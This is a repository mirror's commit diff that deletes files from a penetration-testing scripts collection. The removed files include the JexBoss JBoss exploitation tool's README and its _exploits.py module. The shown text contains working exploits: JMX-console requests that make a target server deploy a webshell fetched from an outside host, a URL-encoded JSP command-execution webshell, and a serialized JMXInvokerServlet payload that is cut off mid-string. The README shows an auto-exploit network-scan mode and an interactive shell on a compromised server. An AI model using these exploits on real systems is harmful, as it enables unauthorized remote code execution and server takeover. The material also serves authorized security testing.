github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

update

pull/5/head
ym2011 2020-03-18 21:38:38 +08:00
parent 4b20df8cfa
commit a60bb668ca
351 changed files with 0 additions and 404573 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
Burpsuite/Extender
View File

@ -1 +0,0 @@
readme

0
GitHack-master/GitHack.py → Github_Leak/GitHack-master/GitHack.py
View File

0
GitHack-master/README.md → Github_Leak/GitHack-master/README.md
View File

0
Bruteforce/comm/__init__.py → Github_Leak/GitHack-master/lib/__init__.py
View File

0
GitHack-master/lib/__init__.pyc → Github_Leak/GitHack-master/lib/__init__.pyc
View File

0
GitHack-master/lib/parser.py → Github_Leak/GitHack-master/lib/parser.py
View File

0
GitHack-master/lib/parser.pyc → Github_Leak/GitHack-master/lib/parser.pyc
View File

0
Github-Hunter-master/GithubHunter.py → Github_Leak/Github-Hunter-master/GithubHunter.py
View File

0
Github-Hunter-master/README.md → Github_Leak/Github-Hunter-master/README.md
View File

0
Github-Hunter-master/info.ini.example → Github_Leak/Github-Hunter-master/info.ini.example
View File

0
Github-Hunter-master/requirements.txt → Github_Leak/Github-Hunter-master/requirements.txt
View File

60
Jboss_Verify_EXploitation/.gitignore vendored
View File

@ -1,60 +0,0 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.cache
nosetests.xml
coverage.xml
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# PyCharm project files
.idea/
# I/O files
*.csv

250
Jboss_Verify_EXploitation/README.md
View File

@ -1,250 +0,0 @@
JexBoss - Jboss verify and EXploitation Tool
=======
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.
Requirements
----
* Python >= 2.7.x
* [urllib3](https://pypi.python.org/pypi/urllib3)
* [ipaddress](https://pypi.python.org/pypi/ipaddress)
Installation
----
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
OR:
Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
If you are using CentOS with Python 2.6, please install Python2.7.
Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash
Features
----
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
* /admin-console [ NEW ]
- tested and working in JBoss versions 5 and 6
* /jmx-console
- tested and working in JBoss versions 4, 5 and 6
* /web-console/Invoker
- tested and working in JBoss versions 4
* /invoker/JMXInvokerServlet
- tested and working in JBoss versions 4 and 5
Screenshots
----
* Standalone mode:
```
$ python jexboss.py -host 192.168.0.114:8080
```
![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode.png)
* Usage modes:
```
$ python jexboss.py -h
```
![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/help_usage.png)
* Network scan mode:
```
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
```
![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/network_scan_mode.png)
* Network scan with auto-exploit mode:
```
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
```
![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/scan_with_auto_exploit_mode.png)
* Results and recommendations:
![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/results_and_recommendations.png)
Usage example
----
* Check the file "demo.png"
* Auto scan mode:
```
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
```
* File scan mode:
```
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
```
* More Options:
```
$ python jexboss.py -h
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE
PERMISSION!!!)
--disable-check-updates, -D
Disable the check for updates performed by JSP
Webshell at:
http://webshell.jexboss.net/jsp_version.txt
-mode {auto-scan,file-scan,standalone}
Operation mode
Standalone mode:
-host HOST Host address to be checked (eg.
http://192.168.0.10:8080)
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for
each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per
line)
-out FILENAME_RESULTS
File name to store the file scan results
```
* Standalone mode:
```
* Via git:
$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py -host https://site-teste.com
* Or via download:
$ wget https://github.com/joaomatosf/jexboss/archive/master.zip
$ unzip master.zip
$ cd jexboss-master
$ python jexboss.py -host https://site-teste.com
* --- JexBoss: Jboss verify and EXploitation Tool --- *
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#
** Checking Host: https://site-teste.com **
* Checking admin-console: [ EXPOSED ]
* Checking web-console: [ OK ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via "jmx-console" ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes
* Sending exploit code to https://site-teste.com. Wait...
* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
* https://site-teste.com:
Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.5 (Final)
uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0
[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin
[Type commands or "exit" to finish]
Shell> hostname
fwgw
[Type commands or "exit" to finish]
Shell> ls -all /home
total 16
drwxr-xr-x. 4 root root 4096 Jan 26 2015 .
dr-xr-xr-x. 23 root root 4096 Mar 31 04:51 ..
-rwxrwxrwx. 1 root root 0 Jan 26 2015 file1
-rw-r-----. 1 root root 0 Jan 26 2015 file2
-rw-rw-r--. 1 root root 0 Jan 26 2015 file3
drwx------. 2 joao joao 4096 Jan 26 2015 joao
drwx------. 2 maria maria 4096 Jan 26 2015 maria
[Type commands or "exit" to finish]
Shell>exit
Results: potentially compromised server!
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*
Recommendations:
- Remove web consoles and services that are not used, eg:
$ rm web-console.war
$ rm http-invoker.sar
$ rm jmx-console.war
$ rm jmx-invoker-adaptor-server.sar
$ rm admin-console.war
- Use a reverse proxy (eg. nginx, apache, F5)
- Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)
- Search vestiges of exploitation within the directories "deploy" and "management".
References:
[1] - https://developer.jboss.org/wiki/SecureTheJmxConsole
[2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf
- If possible, discard this server!
* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*
* Info: review, suggestions, updates, etc:
https://github.com/joaomatosf/jexboss
* DONATE: Please consider making a donation to help improve this tool,
including research to new versions of JBoss and zero days.
* Paypal: joaomatosf@gmail.com
* Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
* URI: bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss
```
Questions, problems, suggestions and etc:
----
* joaomatosf@gmail.com

555
Jboss_Verify_EXploitation/_exploits.py
View File

@ -1,555 +0,0 @@
# -*- coding: utf-8 -*-
"""
Module to group exploits of the JexBoss
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from jexboss import *
from random import randint
import urllib
from sys import version_info
if version_info[0] >= 3:
from urllib.parse import quote
def exploit_jmx_console_main_deploy(url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://"+url
jsp = "http://www.joaomatosf.com/rnp/jexws3.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0="+jsp)
print(GREEN + "\n * Info: This exploit will force the server to deploy the webshell " +
"\n available at: " + jsp + ENDC)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_console_file_repository(url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A"
"%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45"
"%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E"
"%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20"
"%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C"
"%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D"
"%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75"
"%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22"
"%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48"
"%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C"
"%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B"
"%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20"
"%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B"
"%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65"
"%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F"
"%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A"
"%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E"
"%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68"
"%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22"
"%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65"
"%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22"
"%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C"
"%20%22%2D%22%29%3B%20%74%72%79%7B%20%69%66%20%28%63%68%65%63%6B%55%70%64%61%74%65%73%20"
"%3D%3D%20%74%72%75%65%29%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%73%65"
"%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22"
"%2C%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22"
"%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B"
"%20%69%66%20%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48"
"%6F%75%72%43%68%65%63%6B%29%2E%65%78%69%73%74%73%28%29%29%7B%20%50%72%69%6E%74%57%72%69"
"%74%65%72%20%77%72%69%74%65%72%20%3D%20%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28"
"%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%29%3B%20%77%72%69%74"
"%65%72%2E%63%6C%6F%73%65%28%29%3B%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64"
"%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28"
"%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65"
"%61%6D%28%29%29%29%3B%20%69%6E%74%20%6C%61%73%74%56%65%72%73%69%6F%6E%20%3D%20%49%6E%74"
"%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73"
"%70%6C%69%74%28%22%20%22%29%5B%31%5D%29%3B%20%69%66%20%28%6C%61%73%74%56%65%72%73%69%6F"
"%6E%20%3E%20%76%65%72%73%69%6F%6E%29%7B%20%6F%75%74%2E%70%72%69%6E%74%28%22%50%6C%65%61"
"%73%65%20%6E%6F%74%65%3A%20%74%68%65%72%65%20%69%73%20%61%6E%20%75%70%64%61%74%65%20%74"
"%6F%20%4A%65%78%42%6F%73%73%20%4A%53%50%20%57%65%62%73%68%65%6C%6C%2E%20%57%65%20%72%65"
"%63%6F%6D%6D%65%6E%64%20%74%68%61%74%20%79%6F%75%20%72%65%72%75%6E%20%74%68%65%20%4A%65"
"%78%42%6F%73%73%20%74%6F%20%72%65%64%65%70%6C%6F%79%20%74%68%65%20%6E%65%77%20%76%65%72"
"%73%69%6F%6E%20%6F%66%20%77%65%62%73%68%65%6C%6C%20%69%6E%20%4A%42%6F%73%73%20%73%65%72"
"%76%65%72%20%74%65%73%74%65%64%2E%22%29%3B%20%7D%20%7D%20%65%6C%73%65%20%69%66%20%28%73"
"%68%2E%63%6F%6E%74%61%69%6E%73%28%22%69%64%22%29%20%7C%7C%20%73%68%2E%63%6F%6E%74%61%69"
"%6E%73%28%22%69%70%63%6F%6E%66%69%67%22%29%29%20%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70"
"%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%20%7D%20%7D%20%7D"
"%20%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74"
"%6C%6E%28%22%45%72%72%6F%72%20%63%68%65%63%6B%69%6E%67%20%66%6F%72%20%75%70%64%61%74%65"
"%73%22%29%3B%7D%20%74%72%79%20%7B%20%50%72%6F%63%65%73%73%20%70%3B%20%69%66%20%28%53%79"
"%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%6F%73%2E%6E%61%6D%65%22%29%2E%74"
"%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3E"
"%20%30%20%7C%7C%20%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69"
"%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%20"
"%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
"%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%20%7D%20%65%6C%73%65%20%7B%20"
"%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
"%28%73%68%29%3B%20%7D%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64"
"%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65"
"%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72"
"%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%64%69%73%72"
"%20%21%3D%20%6E%75%6C%6C%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29"
"%3B%20%64%69%73%72%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C"
"%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%2E%22%29%3B%20%7D%20%7D%20%25%3E")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws3.war&argType=java.lang.String&arg1=jexws3&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers)
return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_invoker_file_repository(url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x08\xb4\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0b\x6a\x65\x78\x69\x6e\x76\x33\x2e\x77\x61"
"\x72\x74\x00\x07\x6a\x65\x78\x69\x6e\x76\x33\x74\x00\x04\x2e\x6a\x73\x70\x74"
"\x07\x79\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22"
"\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f"
"\x2e\x2a\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67"
"\x65\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e"
"\x20\x3c\x70\x72\x65\x3e\x20\x3c\x25\x20\x69\x6e\x74\x20\x76\x65\x72\x73\x69"
"\x6f\x6e\x20\x3d\x20\x33\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74"
"\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22"
"\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x62\x6f\x6f\x6c\x65\x61"
"\x6e\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x3b\x20\x48\x74\x74"
"\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x63\x6f\x6e\x6e"
"\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x6e\x75\x6c\x6c"
"\x3b\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x62\x72"
"\x20\x3d\x20\x6e\x75\x6c\x6c\x3b\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73"
"\x65\x74\x43\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x28\x22\x74\x65\x78\x74"
"\x2f\x68\x74\x6d\x6c\x22\x29\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73"
"\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x2d"
"\x75\x70\x64\x61\x74\x65\x73\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20\x26"
"\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72"
"\x28\x22\x63\x68\x65\x63\x6b\x2d\x75\x70\x64\x61\x74\x65\x73\x22\x29\x2e\x65"
"\x71\x75\x61\x6c\x73\x28\x22\x66\x61\x6c\x73\x65\x22\x29\x29\x7b\x20\x63\x68"
"\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x66\x61\x6c\x73\x65\x3b"
"\x20\x7d\x65\x6c\x73\x65\x20\x7b\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74"
"\x65\x73\x20\x3d\x20\x74\x72\x75\x65\x3b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63"
"\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c"
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x6e\x65\x77\x20\x55\x52\x4c"
"\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73\x68\x65\x6c\x6c\x2e\x6a"
"\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x6a\x73\x70\x5f\x76\x65\x72\x73"
"\x69\x6f\x6e\x2e\x74\x78\x74\x22\x29\x2e\x6f\x70\x65\x6e\x43\x6f\x6e\x6e\x65"
"\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x7d\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
"\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x3b\x20\x53\x74\x72\x69\x6e"
"\x67\x20\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x20\x3d\x20\x28"
"\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67"
"\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22\x68"
"\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28\x22"
"\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x74\x72\x79\x7b\x20\x69\x66\x20\x28"
"\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x3d\x20\x74\x72\x75"
"\x65\x29\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
"\x73\x2e\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74"
"\x79\x28\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71"
"\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73"
"\x74\x22\x29\x2b\x22\x3c\x2d\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x52\x65\x6d\x6f\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20"
"\x28\x21\x6e\x65\x77\x20\x46\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x7a\x00"
"\x00\x04\x00\x5f\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b"
"\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7b\x20\x50\x72\x69\x6e\x74\x57"
"\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74\x65\x72\x20\x3d\x20\x6e\x65\x77\x20"
"\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x5f"
"\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x29\x3b\x20\x77"
"\x72\x69\x74\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x62\x72\x20\x3d"
"\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72"
"\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61"
"\x64\x65\x72\x28\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
"\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29"
"\x29\x3b\x20\x69\x6e\x74\x20\x6c\x61\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x20"
